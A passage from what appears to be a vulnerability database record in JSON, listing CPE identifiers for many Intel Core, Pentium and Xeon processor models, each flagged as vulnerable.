{ "cpe23Uri": "cpe:2.3:h:intel:core_i5:8250u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:8350u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:8400:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i5:8600k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7y75:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:610e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620le:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620lm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:620um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:640lm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:640m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:640um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:660lm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:660ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:660um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:680um:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:720qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:740qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:820qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:840qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:860:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:860s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:870:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:870s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:875k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:880:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:920:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:920xm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:930:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:940:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:940xm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:950:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:960:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:965:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:970:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:975:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:980:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:980x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:990x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2600s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2610ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2617m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2620m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2629m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2630qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2635qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2637m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2640m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2649m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2655le:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2657m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2670qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2675qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2677m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2700k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2710qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2715qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2720qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2760qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2820qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2860qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2920xm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:2960xm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3517ue:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3520m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3537u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3540m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3555le:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3612qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qe:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3615qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3630qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3632qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3635qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3667u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3687u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3689y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3720qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3740qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3820qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:3840qm:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4500u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4510u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4550u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4558u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4578u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4600u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4610y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4650u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700ec:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4700mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702ec:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4702mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4710mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4712mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4720hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4722hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4750hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4760hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4765t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4770te:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4771:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4785t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4790t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4800mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4810mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4850hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4860hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4870hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4900mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4910mq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4950hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4960hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:4980hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5500u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5550u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5557u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5600u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5650u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5700hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5750hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5775r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5850hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:5950hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7500u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7560u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7567u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7600u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7660u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820eq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hk:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:7920hq:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:8550u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:8650u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y51:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y70:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m:5y71:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m3:6y30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y54:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y57:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:core_m7:6y75:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j2850:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j2900:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j3710:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j4205:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3510:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3700:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3710:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n4200:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5502:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5503:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5504:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5506:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5507:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5603:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5606:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5620:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5630:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5640:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5645:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e5649:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e6510:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e6540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e7520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e7530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:e7540:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5509:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5539:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5549:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l3406:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l3426:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5506:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5508:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5518:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5520:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:h:intel:xeon:l5530:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 